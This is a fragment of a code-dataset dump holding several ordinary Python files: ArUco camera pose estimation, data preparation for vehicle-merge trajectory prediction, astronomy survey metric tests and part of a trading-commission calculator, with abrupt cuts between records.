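    """JSON object keys must be strings; edge-keyed dicts use (u, v) tuples."""
    return {str(k): v for k, v in d.items()}

G = nx.karate_club_graph()
result = {
    "nodes_sample": set(list(G.nodes)[:3]),  # a set, handled by SetEncoder
    "degree_centrality": nx.degree_centrality(G),
    "edge_betweenness_centrality": stringify_keys(nx.edge_betweenness_centrality(G)),
}
print(json.dumps(result, cls=SetEncoder, indent=2)[:200])
# --- end sketch ---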
np.linalg.norm(I - shouldBeIdentity)\r\n return n < 1e-6\r\n \r\n #=======================================================================================================================\r\n\t#=======================================================================================================================\r\n\r\n #Convert Rotation 3x3 Matrix to euler Angles \r\n def rotationMatrixToEulerAngles(self, R):\r\n assert (self.isRotationMatrix(R))\r\n \r\n sy = math.sqrt(R[0, 0] * R[0, 0] + R[1, 0] * R[1, 0])\r\n \r\n singular = sy < 1e-6\r\n \r\n if not singular:\r\n x = math.atan2(R[2,1], R[2,2])\r\n y = math.atan2(-R[2,0], sy)\r\n z = math.atan2(R[1,0], R[0,0])\r\n else:\r\n x = math.atan2(-R[1,2], R[1,1])\r\n y = math.atan2(-R[2,0], sy)\r\n z = 0\r\n \r\n return np.array([x, y, z]) #returns pitch, roll and yaw (units?)\r\n\r\n\r\n #=======================================================================================================================\r\n\t#=======================================================================================================================\r\n\r\n #Display Pose\r\n def Display(self,x,y,z,ex,ey,ez):\r\n print(\"===========================\")\r\n print(\"| Translation (mm) |\")\r\n print(\"===========================\")\r\n print(\"| \")\r\n print(\"| X (Red) : {:4.0f}\".format(x))\r\n print(\"| Y (Green): {:4.0f}\".format(y))\r\n print(\"| Z (Blue) : {:4.0f}\".format(z))\r\n print(\"| \")\r\n print(\"===========================\")\r\n print(\"| Rotation (euler/degree) |\")\r\n print(\"===========================\")\r\n print(\"| \")\r\n print(\"| EulX: {:4.0f}\".format(ex))\r\n print(\"| EulY: {:4.0f}\".format(ey))\r\n print(\"| EulZ: {:4.0f}\".format(ez))\r\n print(\"| \")\r\n print(\"===========================\")\r\n print(\"|Press 'q' on cap to stop|\")\r\n print(\"===========================\")\r\n print(\" \")\r\n\r\n #=======================================================================================================================\r\n\t#=======================================================================================================================\r\n\r\n\r\n #Estimate Pose Values\r\n def poseDetector(self, inputX, inputY, inputZ, tagSetting, cameraSetting):\r\n #Set Tag Type\r\n aruco_dict = cv2.aruco.getPredefinedDictionary(ARUCO_DICT[tagSetting[\"dict\"]])\r\n marker_size = tagSetting[\"tagSize\"]\r\n flip = tagSetting[\"flip\"]\r\n \r\n #Load Camera Calibration\r\n camera_matrix = np.load(\"calibration_matrix.npy\")\r\n camera_distortion = np.load(\"distortion_coefficients.npy\")\r\n\r\n\r\n\r\n #Detect\r\n if inputX == None and inputY == None and inputZ == None:\r\n follow = False\r\n \r\n \r\n #Camera Setting\r\n cap = cv2.VideoCapture(cameraSetting[\"index\"])\r\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, cameraSetting[\"width\"])\r\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, cameraSetting[\"height\"])\r\n cap.set(cv2.CAP_PROP_FPS, cameraSetting[\"fps\"])\r\n\r\n while True:\r\n #\r\n ret, frame = cap.read()\r\n\r\n #Flip Vertically and Horizontally\r\n if flip: frame = cv2.flip(frame,-1)\r\n\r\n #\r\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\r\n #\r\n corners, ids, rejected = cv2.aruco.detectMarkers(gray_frame, aruco_dict, camera_matrix, camera_distortion)\r\n\r\n #If Marker detected\r\n if len(corners) > 0: \r\n #\r\n cv2.aruco.drawDetectedMarkers(frame, corners)\r\n \r\n #estimatePoseSingleMarkers\r\n #rvec_list_all = Rotation Vector of Marker/s from Camera\r\n #tvec_list_all = Translation Vector of Marker/s from Camera\r\n 
#\r\n rvec_list_all, tvec_list_all, _objPoints = cv2.aruco.estimatePoseSingleMarkers(corners, marker_size, camera_matrix, camera_distortion)\r\n \r\n #Obtain First Marker\r\n rvec = rvec_list_all[0][0]\r\n tvec = tvec_list_all[0][0]\r\n \r\n #Draw Axes on Marker\r\n cv2.drawFrameAxes(frame, camera_matrix, camera_distortion, rvec, tvec, 50)\r\n \r\n #Calculate actual 'rvec' and 'tvec'\r\n rvec_flipped = rvec * -1\r\n tvec_flipped = tvec * -1\r\n rotation_matrix, jacobian = cv2.Rodrigues(rvec_flipped)\r\n realworld_tvec = np.dot(rotation_matrix, tvec_flipped)\r\n \r\n #Translation (mm)\r\n x = realworld_tvec[0]\r\n y = realworld_tvec[1]\r\n z = realworld_tvec[2]\r\n\r\n #Euler Angles (degree)\r\n eulerX, eulerY, eulerZ = self.rotationMatrixToEulerAngles(self, rotation_matrix)\r\n\r\n #If Eye in Hand\r\n if follow:\r\n PanTilt.EyeInHand(x, y, z, math.degrees(eulerX), math.degrees(eulerY), math.degrees(eulerZ), inputX, inputY, inputZ)\r\n \r\n #Display on Command Prompt\r\n self.Display(self,x, y, z, math.degrees(eulerX), math.degrees(eulerY), math.degrees(eulerZ))\r\n\r\n #Display on output\r\n tvec_str = \"x=%4.0f y=%4.0f z=%4.0f eulerZ=%4.0f\"%(x, y, z, math.degrees(eulerZ))\r\n cv2.putText(frame, tvec_str, (20, 40), cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 255), 2, cv2.LINE_AA)\r\n \r\n #\r\n cv2.imshow(\"Pose Estimation - Press 'q' to stop\", frame) \r\n\r\n #Check for exit\r\n key = cv2.waitKey(1) & 0xFF\r\n if key == ord('q'): break\r\n \r\n #\r\n cap.release()\r\n cv2.destroyAllWindows()","repo_name":"DSLeong/PoseDetectorPi","sub_path":"tkGUI/PoseDetector.py","file_name":"PoseDetector.py","file_ext":"py","file_size_in_byte":6381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"40630519460","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 23 18:11:36 2016\n\n@author: Derek\n\"\"\"\n\nfrom utils import frame_util as futil\nimport numpy as np\nimport os\nfrom scipy import sparse\nfrom utils import constants\nfrom utils import vehicleclass as v\nimport time\nimport random\n\n\nnumUsing = 0 # 0 to use all\n\n'''Returns the startX and startY for all merge vehicles'''\ndef getStartVals(filename):\n filepath = makeFullPath(filename, '-mergerStartTrajectories.txt')\n A = np.loadtxt(filepath)\n return A[:,[constants.LocalX,constants.LocalY]]\n\n'''Removes the entry corresponding to this vid from the grid'''\ndef removeIDfromGrid(Frame, VID, Grid, compressed):\n #vehicleTraj = Frame[VID]\n if VID not in Frame:\n return Grid\n vehicleData = Frame[VID]\n veh = v.vehicle(vehicleData, compressed)\n xpos = veh.x\n ypos = veh.y\n #[xpos,ypos]=vehicleTraj[[constants.LocalX,constants.LocalY]]\n indexX, indexY = futil.GetGridIndices(xpos,ypos)\n if futil.InGridBounds(veh.getX(), veh.getY()):\n if Grid[indexX][indexY][0] > 1:\n Grid[indexX][indexY][0] = Grid[indexX][indexY][0]-1\n #recalculate velocities?\n else:\n Grid[indexX][indexY] = [0]*len(veh.GridInfo)\n return Grid\n\n'''Called for each merging vehicle, gets all the input data.'''\ndef getXInner(row,dictOfGrids, initPos, dictOfFrames, compressed):\n VID = row[0]\n start = row[1]\n X_for_id = np.array([]) #This will have numFrames rows and sizeGrid+1 columns\n for frame in range(row[1],row[2]):\n t_elapsed = frame-start \n #grid = dictOfGrids[frame]\n #grid = removeIDfromGrid(dictOfFrames[frame],VID,grid, compressed)\n start_grid = dictOfGrids[start]\n start_grid = removeIDfromGrid(dictOfFrames[start],VID,start_grid, compressed)\n \n #grid2 = dictOfGrids[frame-10]\n #grid2 = 
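# --- Editor's sketch (not part of the dataset records) ---
# The PoseDetector.py record ending above converts an OpenCV rotation vector to
# Euler angles. This restates that math on a synthetic rvec, so no camera or
# ArUco marker is needed; the rvec value is made up for illustration.
import math
import cv2
import numpy as np

def rotation_matrix_to_euler(R):
    # ZYX (yaw-pitch-roll) decomposition; falls back near gimbal lock (cos(pitch) ~ 0).
    sy = math.sqrt(R[0, 0] ** 2 + R[1, 0] ** 2)
    if sy > 1e-6:
        return np.array([math.atan2(R[2, 1], R[2, 2]),
                         math.atan2(-R[2, 0], sy),
                         math.atan2(R[1, 0], R[0, 0])])
    return np.array([math.atan2(-R[1, 2], R[1, 1]),
                     math.atan2(-R[2, 0], sy),
                     0.0])

rvec = np.array([[0.1], [-0.2], [0.3]])      # synthetic rotation vector (radians)
R, _jacobian = cv2.Rodrigues(rvec)           # 3x3 rotation matrix
print(np.degrees(rotation_matrix_to_euler(R)))
# --- end sketch ---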
removeIDfromGrid(dictOfFrames[frame-10],VID,grid2)\n \n init_grid_avg = futil.getGridMeans(dictOfGrids[frame])\n \n #additional = np.append(t_elapsed, grid2.flatten())\n additional = np.append(initPos,t_elapsed)\n #additional = t_elapsed \n Xrow = np.append(additional,start_grid.flatten())\n #Xrow = np.append(additional,init_grid_avg)\n #Xrow = additional\n Xrow.shape = (1,len(Xrow))\n if X_for_id.shape == (0,):\n X_for_id = Xrow\n else:\n X_for_id = np.append(X_for_id,Xrow,axis=0)\n # Xi = np.append(Xi, initPos)\n # Xi.shape = (1,len(Xi))\n return (X_for_id)\n\n'''Gets ground truths for each merge vehicle'''\ndef getYInner(row, dictOfFrames, predict, compressed):\n y_for_id = np.array([]) #this will have numFrames rows and 1 column\n for frame in range(row[1],row[2]):\n veh = v.vehicle(dictOfFrames[frame], compressed)\n if predict == 'Y':\n yrow = veh.y\n elif predict == 'X':\n yrow = veh.x\n else:\n print(\"ERROR: invalid prediction request:\", predict)\n return None\n y_for_id = np.append(y_for_id,yrow)\n return y_for_id\n\n'''AVOID---This probably uses a significant amount of memory'''\ndef append(orig, add, axisNum=0):\n if orig.shape == (0,):\n orig = add\n else:\n orig = np.append(orig,add,axis=axisNum)\n return orig\n\n#get the training examples\ndef getX(filename, trainIDs, testIDs, mean_centered):\n #filename=\"res/101_trajectories/aug_trajectories-0750am-0805am.txt\"\n path = os.getcwd()+'/'\n compressed = 'compressed' in filename\n frameDict = futil.LoadDictFromTxt(path+filename, 'frame')\n print(\"Gotten frameDict\",time.ctime())\n dictOfGrids = futil.GetGridsFromFrameDict(frameDict, mean_centered, compressed)\n print(\"Gotten dictOfGrids\",time.ctime())\n #filepath = makePathMR(filename, '-mergerMinRanges')\n filepath = makeFullPath(filename, '-mergerRanges.txt')\n MR = np.loadtxt(filepath, dtype='int')\n '''MR=MergeRanges. MR[:,0]=merge ids, MR[:,1]=start frame, MR[:,2] = end'''\n print (\"Done loading in getX\", time.ctime())\n start = getStartVals(filename) \n Xtrain = np.array([]) #will have numTrain*numFrames rows and size(grid)+1 columns\n Xtest = np.array([])\n it = 0\n trainEmpty = True\n testEmpty = True\n if not numUsing == 0:\n MR = MR[:numUsing]\n for row in MR:\n thisStart = start[it]\n XVID = sparse.csr_matrix(np.ascontiguousarray(getXInner(row, dictOfGrids,thisStart,frameDict, compressed)))\n if row[0] in trainIDs:\n if trainEmpty == True:\n Xtrain = XVID\n trainEmpty = False\n else:\n Xtrain = sparse.vstack((Xtrain,XVID))#,axis=0)\n print(\"Finished getting X data for Merger with VID:\",row[0],\" and it is a training example\", time.ctime())\n else:\n if testEmpty == True:\n Xtest = XVID\n testEmpty = False\n else:\n Xtest = sparse.vstack((Xtest,XVID))#np.append(Xtest,XVID,axis=0)\n print(\"Finished getting X data for Merger with VID:\",row[0],\" and it is a test example\")\n it += 1\n print(Xtrain.shape)\n return Xtrain, Xtest\n\ndef getXClusters(filename, trainIDs, testIDs, mean_centered, clusterIDs0, clusterIDs1, clusterIDs2):\n #filename=\"res/101_trajectories/aug_trajectories-0750am-0805am.txt\"\n path = os.getcwd()+'/'\n compressed = 'compressed' in filename\n frameDict = futil.LoadDictFromTxt(path+filename, 'frame')\n print(\"Gotten frameDict\",time.ctime())\n dictOfGrids = futil.GetGridsFromFrameDict(frameDict, mean_centered, compressed)\n print(\"Gotten dictOfGrids\",time.ctime())\n #filepath = makePathMR(filename, '-mergerMinRanges')\n filepath = makeFullPath(filename, '-mergerRanges.txt')\n MR = np.loadtxt(filepath, dtype='int')\n '''MR=MergeRanges. 
MR[:,0]=merge ids, MR[:,1]=start frame, MR[:,2] = end'''\n print (\"Done loading in getX\", time.ctime())\n start = getStartVals(filename) \n Xtrain1 = np.array([])\n Xtrain2 = np.array([])\n Xtrain0 = np.array([]) #will have numTrain*numFrames rows and size(grid)+1 columns\n Xtest1 = np.array([])\n Xtest2 = np.array([])\n Xtest0 = np.array([])\n it = 0\n trainEmpty = [True]*3\n testEmpty = [True]*3\n if not numUsing == 0:\n MR = MR[:numUsing]\n for row in MR:\n thisStart = start[it]\n XVID = sparse.csr_matrix(np.ascontiguousarray(getXInner(row, dictOfGrids,thisStart,frameDict, compressed)))\n if row[0] in trainIDs:\n if row[0] in clusterIDs0:\n if trainEmpty[0] == True:\n Xtrain0 = XVID\n trainEmpty[0] = False\n else:\n Xtrain0 = sparse.vstack((Xtrain0,XVID))#,axis=0)\n elif row[0] in clusterIDs1:\n if trainEmpty[1] == True:\n Xtrain1 = XVID\n trainEmpty[1] = False\n else:\n Xtrain1 = sparse.vstack((Xtrain1,XVID))#,axis=0)\n elif row[0] in clusterIDs2:\n if trainEmpty[2] == True:\n Xtrain2 = XVID\n trainEmpty[2] = False\n else:\n Xtrain2 = sparse.vstack((Xtrain2,XVID))#,axis=0)\n print(\"Finished getting X data for Merger with VID:\",row[0],\" and it is a training example\", time.ctime())\n else:\n if row[0] in clusterIDs0:\n if testEmpty[0] == True:\n Xtest0 = XVID\n testEmpty[0] = False\n else:\n Xtest0 = sparse.vstack((Xtest0,XVID))#,axis=0)\n elif row[0] in clusterIDs1:\n if testEmpty[1] == True:\n Xtest1 = XVID\n testEmpty[1] = False\n else:\n Xtest1 = sparse.vstack((Xtest1,XVID))#,axis=0)\n elif row[0] in clusterIDs2:\n if testEmpty[2] == True:\n Xtest2 = XVID\n testEmpty[2] = False\n else:\n Xtest2 = sparse.vstack((Xtest2,XVID))#,axis=0)\n #Xtest = sparse.vstack((Xtest,XVID))#np.append(Xtest,XVID,axis=0)\n print(\"Finished getting X data for Merger with VID:\",row[0],\" and it is a test example\")\n it += 1\n return Xtrain0, Xtrain1, Xtrain2, Xtest0, Xtest1, Xtest2\n \ndef getYClusters(filename, trainIDs, testIDs, predict, clusterIDs0, clusterIDs1, clusterIDs2):\n path = os.getcwd()+'/'\n IDDict = futil.LoadDictFromTxt(path+filename, 'vid')\n compressed = 'compressed' in filename\n #filepath = makePathMR(filename, '-mergerMinRanges')\n filepath = makeFullPath(filename, '-mergerRanges.txt')\n MR = np.loadtxt(filepath, dtype='int')\n Ytrain0 = np.array([]) \n Ytrain1 = np.array([])\n Ytrain2 = np.array([]) #will have numTrain*numFrames rows and 1 column\n Ytest0 = np.array([])\n Ytest1 = np.array([]) \n Ytest2 = np.array([])\n if not numUsing == 0:\n MR = MR[:numUsing]\n for row in MR:\n YVID = np.ascontiguousarray(getYInner(row,IDDict[row[0]], predict, compressed))\n if row[0] in trainIDs:\n if row[0] in clusterIDs0:\n Ytrain0=append(Ytrain0,YVID)\n elif row[0] in clusterIDs1:\n Ytrain1=append(Ytrain1,YVID)\n elif row[0] in clusterIDs2:\n Ytrain2=append(Ytrain2,YVID)\n #uses append because Y is small in memory\n print(\"Finished getting Y data for Merger with VID:\",row[0],\" and it is a training example\")\n else:\n if row[0] in clusterIDs0:\n Ytest0=append(Ytest0,YVID)\n elif row[0] in clusterIDs1:\n Ytest1=append(Ytest1,YVID)\n elif row[0] in clusterIDs2:\n Ytest2=append(Ytest2,YVID)\n #Ytest=append(Ytest,YVID)\n print(\"Finished getting Y data for Merger with VID:\",row[0],\" and it is a test example\")\n return np.ascontiguousarray(Ytrain0),np.ascontiguousarray(Ytrain1), np.ascontiguousarray(Ytrain2), np.ascontiguousarray(Ytest0), np.ascontiguousarray(Ytest1), np.ascontiguousarray(Ytest2)\n\ndef getY(filename, trainIDs, testIDs, predict):\n path = os.getcwd()+'/'\n IDDict = 
futil.LoadDictFromTxt(path+filename, 'vid')\n compressed = 'compressed' in filename\n #filepath = makePathMR(filename, '-mergerMinRanges')\n filepath = makeFullPath(filename, '-mergerRanges.txt')\n MR = np.loadtxt(filepath, dtype='int')\n Ytrain = np.array([]) #will have numTrain*numFrames rows and 1 column\n Ytest = np.array([])\n if not numUsing == 0:\n MR = MR[:numUsing]\n for row in MR:\n YVID = np.ascontiguousarray(getYInner(row,IDDict[row[0]], predict, compressed))\n if row[0] in trainIDs:\n Ytrain=append(Ytrain,YVID) #uses append because Y is small in memory\n print(\"Finished getting Y data for Merger with VID:\",row[0],\" and it is a training example\")\n else:\n Ytest=append(Ytest,YVID)\n print(\"Finished getting Y data for Merger with VID:\",row[0],\" and it is a test example\")\n return np.ascontiguousarray(Ytrain), np.ascontiguousarray(Ytest)\n \ndef makePathMR(filename, end):\n path = os.getcwd()+'/'\n a = len('aug_trajectories-0750am-0805am.txt')\n return path+filename[:-a]+filename[(-a+4):-4]+end+'.txt'\n\ndef getSpan(filename):\n return filename[-17:][:-4]\n \ndef makePathToTrajectories(filename):\n outerFolder = filename[4:-35]\n path1 = os.getcwd() + '/res' + '/' + outerFolder + '/' \n path = path1 + getSpan(filename) + '/' \n if not os.path.exists(path):\n os.makedirs(path) \n return path\n\ndef makeFullPath(filename, end=''):\n path = makePathToTrajectories(filename)\n return path + end\n\ndef makeTrainTestData(filename, portionTrain, seed=None):\n # example filename=\"res/101_trajectories/aug_trajectories-0750am-0805am.txt\"\n #filepath = makePathMR(filename, '-mergerMinRanges')\n filepath = makeFullPath(filename, '-mergerRanges.txt')\n MR = np.loadtxt(filepath, dtype='int')\n traintest = [[],[]]\n random.seed(seed)\n if not numUsing == 0:\n MR = MR[:numUsing]\n for row in MR:\n traintest[random.random() > portionTrain].append(row[0])\n train = traintest[0]\n test = traintest[1]\n filepathTrain = makeFullPath(filename, 'trainIDs.txt')\n filepathTest = makeFullPath(filename, 'testIDs.txt')\n np.savetxt(filepathTrain, train)\n np.savetxt(filepathTest, test)\n return train, test\n\ndef loadTrainTestData(filename):\n filepathTrain = makeFullPath(filename, 'trainIDs.txt')\n filepathTest = makeFullPath(filename, 'testIDs.txt')\n trainIDs = np.loadtxt(filepathTrain)\n testIDs = np.loadtxt(filepathTest)\n return trainIDs, testIDs\n\ndef saveSparse(filepath, X):\n if X.shape == (0,):\n return\n data = X.data\n indices = X.indices\n indptr = X.indptr\n np.savetxt(filepath + '-data',data)\n np.savetxt(filepath + '-indices',indices)\n np.savetxt(filepath + '-indptr',indptr)\n\ndef loadSparse(filepath):\n data = np.loadtxt(filepath + '-data')\n indices = np.loadtxt(filepath + '-indices')\n indptr = np.loadtxt(filepath + '-indptr')\n return sparse.csr_matrix((data,indices,indptr))\n \ndef saveExampleData(filename,Xtrain,ytrain,Xtest,ytest, mean_centered, predict):\n filepath_Xtrain = makeFullPath(filename, '-Xtrain'+str(mean_centered))\n saveSparse(filepath_Xtrain, Xtrain)\n filepath_ytrain = makeFullPath(filename, '-ytrain'+str(mean_centered))\n np.savetxt(filepath_ytrain, ytrain)\n filepath_Xtest = makeFullPath(filename, '-Xtest'+str(mean_centered)+predict)\n saveSparse(filepath_Xtest, Xtest)\n filepath_ytest = makeFullPath(filename, '-ytest'+str(mean_centered)+predict)\n np.savetxt(filepath_ytest, ytest)\n\ndef readExampleData(filename, mean_centered, predict):\n filepath_Xtrain = makeFullPath(filename, '-Xtrain'+str(mean_centered))\n Xtrain = loadSparse(filepath_Xtrain)\n 
print(\"Xtrain loaded.\",time.ctime())\n filepath_Xtest = makeFullPath(filename, '-Xtest'+str(mean_centered))\n Xtest = loadSparse(filepath_Xtest)\n print(\"Xtest loaded.\",time.ctime())\n filepath_ytrain = makeFullPath(filename, '-ytrain'+str(mean_centered)+predict)\n ytrain = np.loadtxt(filepath_ytrain)\n print(\"ytrain loaded.\",time.ctime())\n filepath_ytest = makeFullPath(filename, '-ytest'+str(mean_centered)+predict)\n ytest = np.loadtxt(filepath_ytest)\n print(\"ytest loaded.\",time.ctime())\n return Xtrain, ytrain, Xtest, ytest\n \ndef saveExampleDataClusters(filename, Xtrain0, Xtrain1, Xtrain2, ytrain0, ytrain1, ytrain2,\n Xtest0, Xtest1, Xtest2, ytest0, ytest1, ytest2,\n mean_centered, predict):\n filepath_Xtrain = makeFullPath(filename, '-Xtrain0'+str(mean_centered))\n saveSparse(filepath_Xtrain, Xtrain0)\n filepath_Xtrain = makeFullPath(filename, '-Xtrain1'+str(mean_centered))\n saveSparse(filepath_Xtrain, Xtrain1)\n filepath_Xtrain = makeFullPath(filename, '-Xtrain2'+str(mean_centered))\n saveSparse(filepath_Xtrain, Xtrain2)\n \n filepath_ytrain = makeFullPath(filename, '-ytrain0'+str(mean_centered))\n np.savetxt(filepath_ytrain, ytrain0)\n filepath_ytrain = makeFullPath(filename, '-ytrain1'+str(mean_centered))\n np.savetxt(filepath_ytrain, ytrain1)\n filepath_ytrain = makeFullPath(filename, '-ytrain2'+str(mean_centered))\n np.savetxt(filepath_ytrain, ytrain2)\n \n filepath_Xtest = makeFullPath(filename, '-Xtest0'+str(mean_centered)+predict)\n saveSparse(filepath_Xtest, Xtest0)\n filepath_Xtest = makeFullPath(filename, '-Xtest1'+str(mean_centered)+predict)\n saveSparse(filepath_Xtest, Xtest1)\n filepath_Xtest = makeFullPath(filename, '-Xtest2'+str(mean_centered)+predict)\n saveSparse(filepath_Xtest, Xtest2)\n \n filepath_ytest = makeFullPath(filename, '-ytest0'+str(mean_centered)+predict)\n np.savetxt(filepath_ytest, ytest0)\n filepath_ytest = makeFullPath(filename, '-ytest1'+str(mean_centered)+predict)\n np.savetxt(filepath_ytest, ytest1)\n filepath_ytest = makeFullPath(filename, '-ytest2'+str(mean_centered)+predict)\n np.savetxt(filepath_ytest, ytest2)\n \n \ndef readExampleDataClusters(filename, mean_centered, predict):\n filepath_Xtrain0 = makeFullPath(filename, '-Xtrain0'+str(mean_centered))\n Xtrain0 = loadSparse(filepath_Xtrain0)\n filepath_Xtrain1 = makeFullPath(filename, '-Xtrain1'+str(mean_centered))\n Xtrain1 = loadSparse(filepath_Xtrain1)\n filepath_Xtrain2 = makeFullPath(filename, '-Xtrain2'+str(mean_centered))\n Xtrain2 = loadSparse(filepath_Xtrain2)\n print(\"Xtrain loaded.\",time.ctime())\n \n filepath_Xtest0 = makeFullPath(filename, '-Xtest0'+str(mean_centered))\n Xtest0 = loadSparse(filepath_Xtest0)\n filepath_Xtest1 = makeFullPath(filename, '-Xtest1'+str(mean_centered))\n Xtest1 = loadSparse(filepath_Xtest1)\n filepath_Xtest2 = makeFullPath(filename, '-Xtest2'+str(mean_centered))\n Xtest2 = loadSparse(filepath_Xtest2)\n print(\"Xtest loaded.\",time.ctime())\n \n filepath_ytrain0 = makeFullPath(filename, '-ytrain0'+str(mean_centered)+predict)\n ytrain0 = np.loadtxt(filepath_ytrain0)\n filepath_ytrain1 = makeFullPath(filename, '-ytrain1'+str(mean_centered)+predict)\n ytrain1 = np.loadtxt(filepath_ytrain1)\n filepath_ytrain2 = makeFullPath(filename, '-ytrain2'+str(mean_centered)+predict)\n ytrain2 = np.loadtxt(filepath_ytrain2)\n print(\"ytrain loaded.\",time.ctime())\n \n filepath_ytest0 = makeFullPath(filename, '-ytest0'+str(mean_centered)+predict)\n ytest0 = np.loadtxt(filepath_ytest0)\n filepath_ytest1 = makeFullPath(filename, 
'-ytest1'+str(mean_centered)+predict)\n ytest1 = np.loadtxt(filepath_ytest1)\n filepath_ytest2 = makeFullPath(filename, '-ytest2'+str(mean_centered)+predict)\n ytest2 = np.loadtxt(filepath_ytest2)\n print(\"ytest loaded.\",time.ctime())\n return Xtrain0, Xtrain1, Xtrain2, ytrain0, ytrain1, ytrain2, Xtest0, Xtest1, Xtest2, ytest0, ytest1, ytest2\n \n \n \n \n ","repo_name":"djp42/IntentionPrediction","sub_path":"deprecated/learn_util.py","file_name":"learn_util.py","file_ext":"py","file_size_in_byte":18112,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"781037007","text":"import matplotlib\n\nmatplotlib.use(\"Agg\")\nimport unittest\n\nimport numpy as np\n\nimport rubin_sim.maf.metrics as metrics\nimport rubin_sim.maf.stackers as stackers\n\n\nclass TestCalibrationMetrics(unittest.TestCase):\n def test_parallax_metric(self):\n \"\"\"\n Test the parallax metric.\n \"\"\"\n names = [\n \"observationStartMJD\",\n \"finSeeing\",\n \"fiveSigmaDepth\",\n \"fieldRA\",\n \"fieldDec\",\n \"filter\",\n ]\n types = [float, float, float, float, float, (np.str_, 1)]\n data = np.zeros(700, dtype=list(zip(names, types)))\n slice_point = {\"sid\": 0}\n data[\"observationStartMJD\"] = np.arange(700) + 56762\n data[\"finSeeing\"] = 0.7\n data[\"filter\"][0:100] = str(\"r\")\n data[\"filter\"][100:200] = str(\"u\")\n data[\"filter\"][200:] = str(\"g\")\n data[\"fiveSigmaDepth\"] = 24.0\n stacker = stackers.ParallaxFactorStacker()\n data = stacker.run(data)\n norm_flags = [False, True]\n for flag in norm_flags:\n data[\"finSeeing\"] = 0.7\n data[\"fiveSigmaDepth\"] = 24.0\n baseline = metrics.ParallaxMetric(normalize=flag, seeing_col=\"finSeeing\").run(data, slice_point)\n data[\"finSeeing\"] = data[\"finSeeing\"] + 0.3\n worse1 = metrics.ParallaxMetric(normalize=flag, seeing_col=\"finSeeing\").run(data, slice_point)\n worse2 = metrics.ParallaxMetric(normalize=flag, rmag=22.0, seeing_col=\"finSeeing\").run(\n data, slice_point\n )\n worse3 = metrics.ParallaxMetric(normalize=flag, rmag=22.0, seeing_col=\"finSeeing\").run(\n data[0:300], slice_point\n )\n data[\"fiveSigmaDepth\"] = data[\"fiveSigmaDepth\"] - 1.0\n worse4 = metrics.ParallaxMetric(normalize=flag, rmag=22.0, seeing_col=\"finSeeing\").run(\n data[0:300], slice_point\n )\n # Make sure the RMS increases as seeing increases, the star gets fainter,\n # the background gets brighter, or the baseline decreases.\n if flag:\n pass\n else:\n assert worse1 > baseline\n assert worse2 > worse1\n assert worse3 > worse2\n assert worse4 > worse3\n\n def test_proper_motion_metric(self):\n \"\"\"\n Test the ProperMotion metric.\n \"\"\"\n names = [\n \"observationStartMJD\",\n \"finSeeing\",\n \"fiveSigmaDepth\",\n \"fieldRA\",\n \"fieldDec\",\n \"filter\",\n ]\n types = [float, float, float, float, float, (np.str_, 1)]\n data = np.zeros(700, dtype=list(zip(names, types)))\n slice_point = [0]\n stacker = stackers.ParallaxFactorStacker()\n norm_flags = [False, True]\n data[\"observationStartMJD\"] = np.arange(700) + 56762\n data[\"finSeeing\"] = 0.7\n data[\"filter\"][0:100] = str(\"r\")\n data[\"filter\"][100:200] = str(\"u\")\n data[\"filter\"][200:] = str(\"g\")\n data[\"fiveSigmaDepth\"] = 24.0\n data = stacker.run(data)\n for flag in norm_flags:\n data[\"finSeeing\"] = 0.7\n data[\"fiveSigmaDepth\"] = 24\n baseline = metrics.ProperMotionMetric(normalize=flag, seeing_col=\"finSeeing\").run(\n data, slice_point\n )\n data[\"finSeeing\"] = data[\"finSeeing\"] + 0.3\n worse1 = 
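# --- Editor's sketch (not part of the dataset records) ---
# A hedged alternative to the saveSparse/loadSparse helpers in the learn_util.py
# record ending above: SciPy ships a binary round-trip that also preserves the
# matrix shape, which the three-file savetxt approach drops (csr_matrix((data,
# indices, indptr)) must then infer it), and np.loadtxt re-reads the integer
# index arrays as floats, which newer SciPy may reject. Filename is illustrative.
import numpy as np
from scipy import sparse

X = sparse.random(5, 8, density=0.3, format="csr", random_state=0)
sparse.save_npz("X.npz", X)          # single compressed file, shape included
X2 = sparse.load_npz("X.npz")
assert X2.shape == X.shape and (X2 != X).nnz == 0
# --- end sketch ---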
metrics.ProperMotionMetric(normalize=flag, seeing_col=\"finSeeing\").run(data, slice_point)\n worse2 = metrics.ProperMotionMetric(normalize=flag, rmag=22.0, seeing_col=\"finSeeing\").run(\n data, slice_point\n )\n worse3 = metrics.ProperMotionMetric(normalize=flag, rmag=22.0, seeing_col=\"finSeeing\").run(\n data[0:300], slice_point\n )\n data[\"fiveSigmaDepth\"] = data[\"fiveSigmaDepth\"] - 1.0\n worse4 = metrics.ProperMotionMetric(normalize=flag, rmag=22.0, seeing_col=\"finSeeing\").run(\n data[0:300], slice_point\n )\n # Make sure the RMS increases as seeing increases, the star gets fainter,\n # the background gets brighter, or the baseline decreases.\n if flag:\n # When normalized, mag of star and m5 don't matter (just scheduling).\n self.assertAlmostEqual(worse2, worse1)\n self.assertAlmostEqual(worse4, worse3)\n # But using fewer points should make proper motion worse.\n # survey assumed to have same seeing and limiting mags.\n assert worse3 < worse2\n else:\n assert worse1 > baseline\n assert worse2 > worse1\n assert worse3 > worse2\n assert worse4 > worse3\n\n def test_parallax_coverage_metric(self):\n \"\"\"\n Test the parallax coverage\n \"\"\"\n names = [\n \"observationStartMJD\",\n \"finSeeing\",\n \"fiveSigmaDepth\",\n \"fieldRA\",\n \"fieldDec\",\n \"filter\",\n \"ra_pi_amp\",\n \"dec_pi_amp\",\n ]\n types = [float, float, float, float, float, \" maximum:\n commission = maximum\n return commission\n\n except Exception as e:\n log.error(f\"There is a problem in the code!: {e}\\n{getDebugInfo()}\")\n\n def commissions_europe(self): # it was originally just Germany\n # # Austria, Belgio, Danimarca, Finlandia, Francia, Germany, Irlanda, Norvegia, Paesi Bassi, Portogallo,\n # # Regno Unito, Spagna, Svezia, Svizzera\n try:\n # This is the commission which is fixed, always the same\n fixed_commission = 5\n # size is supposed to be the number of shares we are buying for the company.\n commission_percentage = 0.00025 # 0.25 per mille€\n 